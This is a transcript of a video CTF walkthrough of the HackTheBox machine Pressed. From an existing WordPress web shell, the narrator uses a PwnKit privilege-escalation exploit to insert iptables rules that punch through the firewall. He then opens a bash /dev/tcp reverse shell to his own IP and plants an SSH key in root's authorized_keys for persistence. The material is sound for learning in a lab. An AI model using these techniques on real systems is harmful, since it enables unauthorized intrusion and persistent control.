All right, this is OXDF. How's it going? Today we're looking at Pressed from HackTheBox and from UHC. This was the UHC Championship box for January 2022, and it's about to release on HackTheBox. So I've already owned it. I got a blog post that I'll put in the link here. You can go check it out. But I'm doing some Beyond Root stuff here. So basically, I've got a web shell in a WordPress site, and I use that to upload a PwnKit exploit and run that, and I can run commands through it, right? So I can run ID, I can print out the flag. I've owned the box, but I want to go beyond root. I want to try to see if I can get a shell. The problem is that all outbound connections are being blocked. I haven't been able to enumerate the firewall rules yet, but at least everything I've tried to get outbound ping, any TCP is not working. So that's what we're going to do today. We're going to try to see if we can figure out how to make ourselves a hole in the firewall. So with that, let's go ahead and dive in. All right, so here we are in a Linux VM. I'm going to go ahead and try to catch up to where we are coming into this, beyond root section here. I've got this copy of the Kim Schultz PwnKit exploit here. I've modified it a little bit. I chopped out all the prints because it was just making it really loud, and I don't want to be loud. The other thing I've done is I've come here where it used to say bin bash and give you a shell. Because I can't run it through a shell, I'm running it through a web shell. I've changed it to, in this case, ID. It just prints ID. But if I want to, when I want to change what I'm going to change, here's where I'm going to change it. I've got a script I've written for myself called webshell.sh that issues a curl to the web shell I'm going to upload. If I run it right now, it does nothing because the web shell is not there. And then I'm going to use Python. So I'm going to zip through this part. Go back and see the blog post if you want these details. But I'm going to put in the XML RPC, import the library here, and then we'll go ahead and get the posts. So now we have all the posts. Key list. Look at that. So there's the one post right there. I'm going to rename it. I'm going to get a copy of that post object. I'm going to change the content to contain exactly what it used to contain, but also a web shell. Ooh, that paste did not like. Oh, that's a bummer. Okay, we're gonna do this slowly, I guess. My paste sheet got some standby. That was very exciting content, I'm sure. Let's see if this works a little bit better. Mod post content, paste that in, boom. So now we've modded the content to now include our web shell here in this blob. We will repost it. It worked, and now if I come down here and run web shell, it works. Real quick, I think I actually showed this in another video, so I'm definitely not going to go into this in too much detail. But all this is a curl command where I take in the first argument and I pass it up as the command to my flag, and I do some cutting and grepping and setting to get myself just the results. So that's working. The next thing I need to do is go ahead and upload this script, but I'm going to change it first. And so I think what's blocking me is an outbound firewall rule. So I'm going to try IPTables. In fact, we could try IPTables minus L. That's actually probably the first thing to start. We are going in blind here. I haven't actually tried this. So now what I need to do, let's see. I'm missing, so let's see. We're going to import the media module. We're going to read this file that we just have here into a thing called script. We're going to set ourselves some data where script is being passed in as long as the file name and that, and then we will call upload. And it's nice enough to tell us that it's landing right there. So we can come down here, and now if we do webshell.sh, and we do bash, even though it ends in PNG, it doesn't matter, var www HTML, and then we'll grab the rest of, oops, I'm going to need the W. That. If we run this, so we got the IPTables rules. This is cool. So you can see on output, the default is drop, and it's accepting ICMP, TCP if it's established or related. And then interestingly, it accepts all anywhere. I wonder if there's more to that than that, because clearly that's not working. It's one of those ones we'll have to check. Well, let's get a shell first, but I think the first thing I want to do, insert, rather not L, we're going to do -A to add a rule on the output table. And this p TCP minus d 10.10.14.6 minus j accept. And so what that's going to do is it's going to say any traffic from me gets accepted. So this is nice because I don't actually screw up any. If I'm on a shared instance, I'm not just taking the whole instance down and letting anybody in, but now just I get in. So I'll go ahead and remove my web shell. I will reread it, reset data, and redo that. Now it's up there. Now we will run it again, and it ran. Let's see if we can connect back. So we'll open up a window, lvmp minus lvmp 443, why not? And we will do an upload. We don't need any of that. Let's just, I mean, we can try to run as root. Obviously, that's what we want to get our shell as, but let's just see if we can connect. 3. And it's hanging. I was really hoping that was going to work. I don't know, Wireshark. I wonder if it's getting in. This is interesting. Okay. Let's see, can I make this bigger? Awesome. Okay. So we got this stuff right here. I don't quite know what that is actually. That might be from the last one. Actually, I don't know what that is. But I've got this traffic going to port 80. This TCP stream 1. Oh, not 1. That's a FINAC. It's the end of something. I did not start clean. There we go. So here, TCP stream 2 is where we kick off. We're sending our command up. We're trying to run netcat. That's cool. But right after that, you can see all of a sudden we're getting in. There's connection from, now I got this so big I can't see it, from 11.142, that's pressed, coming back to me on 443 and with a SYN. And I'm replying with the SYN ACK, and then I'm just getting nothing. It's not nothing ever comes back. I never get the ACK back there. So that tells me, now that I see this, I probably could have checked the IPTables rules. So IPTables inputs are also dropping by default. We're allowing in destination port of 80. We're allowing ICMP echo requests in, and we're allowing anywhere. This rule here must be doing something weird that I'm not understanding. We'll look at that, but I think what we've got here is evidence that we're not getting inbound traffic to work either. So we will put in input rule. In this case, the source will be me, and we will do that. So we are going to come up here. We will remove the web shell. 1, 2, 3, enter, enter, 1, 2, 3, enter, 1, 2, 3, enter. We now put the new payload up. We will run it, and we will try to connect. And we get our connection. Sweet. Yes. So it got it. So that's cool. No, that was just running as user, as whatever the www data. So let's now edit this, and we will do bash minus c bash minus I dev TCP 10.10.14.6 0 and 1. That, and let's get rid of the IPTables. That. Let's see if this works. So we will remove our shell. Oops. Reread, reset data, re-push it upload. It's now uploaded. Need to. It would help if this is not a good reverse shell. 443. So we will remove the shell. Reread that in. We'll get data. We'll upload it. We will listen on 443, and we will run. And we've got a root shell. Another thing we could have done here is written this to just write our public key into the authorized keys file for root and then SSH gen. I'm guessing when I originally hit this box, all I could see was shell. Yeah, all I had access to was nmap just showed 80. But I bet if I do port 22. 10, 10, 11, 142, right, real quick. it's now open, so I could SSH into. So man, we gave our shell up so quickly. Let's run that again and get a shell and feel pumped about it. There we go, root shell. Do our script trick. Script dev null for the output. The command is bash Control-Z stty raw -echo foreground reset. Ooh, it didn't like that. Reset. Oh, I broke it. Oh well. Anyway, you saw the point. So we took down IPTables and got ourselves a shell. Albeit now I busted one, but we can get another one if we want to. So exit. Hopefully that was interesting, and thanks for sticking around to the end. I'll talk to you next time. All right, this is OXDF coming back from the future here. I forgot to check out those IPTables rules, and I wanted to do that. So I'm going to jump back in here, re-get my reverse shell, and this time I'm going to avoid having to try to get a messed up reverse shell. I'm just going to get my public key from here. Grab that. Let's grab it without the end line. And now, let's see, go into root. SLA there is a .ssh folder, and we can echo that. Echo that into authorized keys. Shoot, I really wanted to append, not just. I guess it doesn't really matter, but better to add in than subtract. There's my mouse roll. Okay, so now I should be able to exit this and do an SSH -I and keys edition root at 10.10.11.142. Awesome. Okay, so we got a shell as root here. Cool. So let's look at the IPTables rules. So what got me confused was I was looking at this. Oops, IPTable. I was looking at this, and both input and output have these except all. And my guess was, let's see. My guess was this is going to be related to interfaces. Let's check it out. Okay, yeah. So we look at our input rules. We're accepting TCP on destination port HTTP. Let's put an N in here. We can do. Okay, that's better. I like that. We're accepting on port 80, and we're accepting ICMP type 8, which is echo reply. So we're allowing ourselves to be pinged. We're accepting everything on localhost, and this is the rule I've added in to poke myself through. That's not part of the default configuration. And then this right up here, same thing on the output. We're allowing ICMP out. For echo, we're allowing all established connections, so that way when I do talk to port 80, when it wants to reply, it can get out. Again, we're allowing localhost in and out on that interface, and this is my thing. So again, this in and out looks like it's defining interfaces, and so most of them are on all interfaces, but this one's on localhost and localhost here. So I actually was working with IPsec when he was making this box, and I was helping him test it, and we were getting these delays on loading the web page. And it turns out we're pretty sure we went TCP dump when I tried to access the page, and we saw the delay, and we were seeing traffic from WordPress, I think from WordPress, going to 127.0.0.53 we think that something was on that localhost interface was trying to do a DNS resolution. And I'm guessing this is the rule he put in to fix that, because when he made some change to the IPTables rules, and it got pretty quick. So anyway, cool. That just wanted to make sure we solve that mystery before we move on. And with that, thank you for sticking around to the end, and I'll talk to you next time.